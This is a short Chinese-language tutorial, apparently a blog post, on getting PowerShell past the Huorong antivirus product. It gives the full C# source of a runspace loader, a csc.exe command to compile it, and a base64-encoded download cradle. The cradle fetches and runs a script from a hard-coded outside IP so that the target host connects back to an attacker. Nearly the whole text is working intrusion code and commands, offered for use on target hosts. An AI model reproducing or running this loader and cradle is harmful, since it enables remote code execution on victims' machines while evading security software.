poweshell免杀---过火绒

1.找到csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

2.找到System.Management.Automation.dll

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

执行命令

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /out:C:/power_base64.exe 1.cs

将exe上传到目标主机，用base64编码加载：

base64编码语句

IEX ((new-object net.webclient).downloadstring('http://101.34.38.189/a'))

编码为

SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzEwMS4zNC4zOC4xODkvYScpKQ==

执行命令上线

Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzEwMS4zNC4zOC4xODkvYScpKQ=="

 

 

1.cs

using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.IO;
using System;
using System.Text;
namespace PSLess
{
 class PSLess
 {
   static void Main(string[] args)
   {
     if(args.Length ==0)
         Environment.Exit(1);
 string temp = Base64Decode(args[0]);
     string s=RunScript(temp);
     Console.WriteLine(s);
     Console.ReadKey();
   }
   
 public static string Base64Decode(string s)
 {
    return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
 }
 
 
 private static string RunScript(string script)
 {
    Runspace MyRunspace = RunspaceFactory.CreateRunspace();
    MyRunspace.Open();
    Pipeline MyPipeline = MyRunspace.CreatePipeline();
    MyPipeline.Commands.AddScript(script);
    MyPipeline.Commands.Add("Out-String");
    Collection<PSObject> outputs = MyPipeline.Invoke();
    MyRunspace.Close();
   StringBuilder sb = new StringBuilder();
   foreach (PSObject pobject in outputs)
   {
       sb.AppendLine(pobject.ToString());
   }
    return sb.ToString();
  }
 }
}